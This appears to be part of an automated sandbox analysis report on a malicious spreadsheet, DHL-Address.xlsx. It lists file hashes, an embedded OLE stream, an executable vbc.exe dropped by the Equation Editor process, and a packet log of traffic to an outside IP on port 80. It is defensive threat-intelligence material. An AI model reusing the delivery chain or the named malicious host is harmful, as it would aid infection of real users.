                                                                                              Process:C:\Users\Public\vbc.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):152533
                                                                                              Entropy (8bit):6.31602258454967
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                              MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                              Malicious:false
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                              C:\Users\user\Desktop\~$DHL-Address.xlsx
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):330
                                                                                              Entropy (8bit):1.4377382811115937
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                              Malicious:true
                                                                                              Reputation:moderate, very likely benign file
                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              C:\Users\Public\vbc.exe
                                                                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):843776
                                                                                              Entropy (8bit):7.300736524263088
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:8XT4rp65D+SL7y7INIIdGZMonTVA2Wsa8tpJKS:VhSJNILZn62WJ8td
                                                                                              MD5:B232B5C7754D932B07C0D47F934EFBFE
                                                                                              SHA1:7C3D92552F6EBAB8956727BEECAAC5D22C87A55B
                                                                                              SHA-256:3311CEA59262B019A69FB72B72A36FC8E55D48A0F14F853B3A52FC8740542E99
                                                                                              SHA-512:4E3ABE570FA413FB74B1EFCF56560D5275CBCAF8217779E46DC65E13C2185C23F0BE2B01B91DCB5AEAD24C6F68E8F84B432B7EFBA87F2CC835BFA2848A406740
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._..............P.............>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<X...............................................................(....*&..(.....*.s ........s!........s"........s#........s$........*...0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*&..(*....*...0..<........~.....(+.....,!r...p.....(,...o-...s.............~.....+..*.0...........~.....+..*".......*.0...........(....r=..p~....o/....+..*...0..<........~.....(+.....,!rG..p.....(,

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:Microsoft Excel 2007+
                                                                                              Entropy (8bit):7.995116916272445
                                                                                              TrID:
                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                              • ZIP compressed archive (8000/1) 16.67%
                                                                                              File name:DHL-Address.xlsx
                                                                                              File size:600867
                                                                                              MD5:5de2e8bdb620804fd22d76f1e9fedf6e
                                                                                              SHA1:942ce29cd8138a1594ee416debf753d8eaa71528
                                                                                              SHA256:f5c3bea5b81c221bc8737bd8489154745c8d6644d7d19484218151f9a1c1f656
                                                                                              SHA512:f24f1d93e61dffe4c48995e0a1ef039b7346cbd9f94a65dffac4d360b5f7419306bcffd57f403a7a6764dd38d7ec9b59e1d0462703f834edc368c38bda939e53
                                                                                              SSDEEP:12288:pT8QDq8fMa8L7PerWcF35XNjIko4RH2SMU6ZHAz1OJicXVh/2DV3:tTrUa8LaWkPBdWI1YiJ53
                                                                                              File Content Preview:PK..........!..cm.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                              File Icon

                                                                                              Icon Hash:e4e2aa8aa4b4bcb4

                                                                                              Static OLE Info

                                                                                              General

                                                                                              Document Type:OpenXML
                                                                                              Number of OLE Files:1

                                                                                              OLE File "/opt/package/joesandbox/database/analysis/339078/sample/DHL-Address.xlsx"

                                                                                              Indicators

                                                                                              Has Summary Info:False
                                                                                              Application Name:unknown
                                                                                              Encrypted Document:False
                                                                                              Contains Word Document Stream:
                                                                                              Contains Workbook/Book Stream:
                                                                                              Contains PowerPoint Document Stream:
                                                                                              Contains Visio Document Stream:
                                                                                              Contains ObjectPool Stream:
                                                                                              Flash Objects Count:
                                                                                              Contains VBA Macros:False

                                                                                              Summary

                                                                                              Author:
                                                                                              Last Saved By:
                                                                                              Create Time:2006-09-16T00:00:00Z
                                                                                              Last Saved Time:2021-01-13T08:51:14Z
                                                                                              Creating Application:Microsoft Excel
                                                                                              Security:0

                                                                                              Document Summary

                                                                                              Thumbnail Scaling Desired:false
                                                                                              Company:
                                                                                              Contains Dirty Links:false
                                                                                              Shared Document:false
                                                                                              Changed Hyperlinks:false
                                                                                              Application Version:12.0000

                                                                                              Streams

                                                                                              Stream Path: \x1Ole, File Type: data, Stream Size: 20
                                                                                              General
                                                                                              Stream Path:\x1Ole
                                                                                              File Type:data
                                                                                              Stream Size:20
                                                                                              Entropy:0.568995593589
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Stream Path: \x1oLe10NatIve, File Type: data, Stream Size: 406296
                                                                                              General
                                                                                              Stream Path:\x1oLe10NatIve
                                                                                              File Type:data
                                                                                              Stream Size:406296
                                                                                              Entropy:7.99509276826
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . i 5 . ? R . . . [ . . & A . . . . . % . . . 2 . X . . . . . . U . V . . . . . y ) . . . . . . . . . E . X . . B . . . o . . o . ~ . . ' o . Z . . . . t . v } . . t . . . . k . . . . . . , . . . . T . . % I . . { p u . . . P . . . z . 0 < . . . c 1 . u . . . . . H . . . v . D . . l . . O Y . . . Z . . . . 2 _ . . . . n 5 . . . . F . f . . $ & o . . > . 2 . D . 3 . . . " . . t . . . a ! d . . ~ . 0 u ; . 3 . . . . . . 8 . . E $ . 4 . V . O . . U . . D . ^ . . . _ . V . . . . . 5 j . . . . 1 . .
                                                                                              Data Raw:e6 cd fd 03 02 69 35 d8 3f 52 01 08 9e 5b b8 8a 26 41 db 05 b2 96 04 25 8b 10 8b 32 bd 58 98 b9 ff f7 d5 8b 55 09 56 ff d2 05 b8 1b 79 29 05 d6 11 8d d6 ff e0 a3 1f 45 dd 58 07 c2 42 00 8c 98 6f ad d2 6f 15 7e c7 b0 27 6f bc 5a f6 20 17 01 f2 74 89 76 7d 20 b5 b4 74 9e b4 82 9d 6b b6 e6 d8 90 eb f8 2c d9 b8 d1 a4 54 03 dc 25 49 1c e5 7b 70 75 e4 83 11 50 84 05 b4 7a 83 30 3c ba ad

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 13, 2021 13:17:21.988862038 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.162621021 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.162832975 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.163568020 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.339915037 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.339965105 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.340003967 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.340055943 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.340075970 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.340146065 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.340153933 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.340158939 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514180899 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514231920 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514280081 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514326096 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514339924 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514375925 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514379025 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514383078 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514400005 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514419079 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514425039 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514458895 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514488935 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514496088 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.514523983 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.514544964 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691092968 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691152096 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691190958 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691214085 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691234112 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691241980 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691246986 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691274881 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691288948 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691313982 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691327095 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691351891 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691366911 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691430092 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691390991 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691485882 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691500902 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691528082 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691566944 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691567898 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691576004 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691616058 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691617966 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691659927 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691668034 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691699028 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691710949 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691736937 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691750050 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691776037 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.691790104 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.691833973 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.695110083 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865525961 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865576982 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865614891 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865653038 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865689039 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865726948 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865763903 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865811110 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865808964 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865850925 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865854025 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865856886 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865875006 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865892887 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865922928 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865930080 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865936041 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.865969896 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.865993023 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866007090 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866035938 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866044998 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866063118 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866082907 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866101027 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866130114 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866139889 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866190910 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866199017 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866245031 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866262913 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866283894 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866298914 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866322041 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866336107 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866358995 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866372108 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866395950 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866436958 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866437912 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866461992 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866503954 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866503954 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866547108 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866584063 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866621971 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866624117 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866637945 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866661072 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866683960 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866697073 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866712093 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866735935 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866750956 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866772890 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866794109 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866820097 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:22.866830111 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.866878033 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:22.870326042 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042006016 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042057991 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042094946 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042133093 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042171955 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042218924 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042227983 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042254925 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042262077 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042277098 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042300940 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042310953 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042340040 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042357922 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042377949 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042391062 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042414904 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042426109 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042452097 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042454004 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042499065 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042514086 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042547941 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042557001 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042599916 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042629957 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042635918 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042665005 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042674065 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042711973 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042749882 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042808056 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042812109 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042865992 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042870998 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042915106 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042928934 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042958021 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.042973995 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.042996883 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.043016911 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.043057919 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044562101 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044616938 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044645071 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044672966 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044692993 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044709921 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044737101 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044750929 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044779062 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044809103 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044821978 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044852018 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044888973 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044900894 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044926882 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.044939041 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044965982 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.044975042 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045031071 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045033932 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045073032 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045088053 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045109987 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045115948 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045149088 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045162916 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045186996 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045192003 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045223951 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045242071 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045262098 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045274019 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045306921 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045312881 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045355082 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045366049 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045399904 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045440912 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045480967 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045495987 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045517921 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045523882 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045556068 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045567036 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045592070 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.045594931 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.045640945 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.047358990 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.216813087 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.216839075 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.216852903 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.216865063 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.216876984 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.216895103 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.216911077 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.216927052 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.217044115 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.217104912 CET4916580192.168.2.22192.210.214.178
                                                                                              Jan 13, 2021 13:17:23.220747948 CET8049165192.210.214.178192.168.2.22
                                                                                              Jan 13, 2021 13:17:23.220767975 CET8049165192.210.214.178192.168.2.22
